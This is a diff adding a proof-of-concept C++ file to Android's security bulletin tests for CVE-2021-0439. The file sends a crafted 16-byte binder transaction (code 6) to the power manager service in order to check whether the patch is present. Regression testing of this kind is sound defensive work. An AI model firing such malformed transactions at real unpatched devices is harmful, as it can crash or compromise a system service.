diff options
Diffstat (limited to 'hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp')
-rw-r--r-- | hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp | 49 |
1 files changed, 49 insertions, 0 deletions
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp new file mode 100644 index 00000000000..65cab130f75 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp @@ -0,0 +1,49 @@ +/* + * Copyright 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <binder/IServiceManager.h> +#include <binder/Parcel.h> + +using namespace android; + +int main() { + sp<IServiceManager> sm = defaultServiceManager(); + sp<IBinder> binder = sm->getService(String16("power")); + if (!binder) { + return EXIT_FAILURE; + } + Parcel data, result; + data.writeInterfaceToken(String16("android.os.IPowerManager")); + char d[] = {static_cast<char>(0xc9), + static_cast<char>(0xa4), + 0x10, + static_cast<char>(0xd4), + 0x00, + 0x00, + 0x00, + 0x00, + 0x00, + 0x27, + 0x00, + 0x5a, + 0x00, + 0x00, + 0x00, + 0x00}; + data.write(d, sizeof(d)); + binder->transact(6, data, &result); + return EXIT_SUCCESS; +} |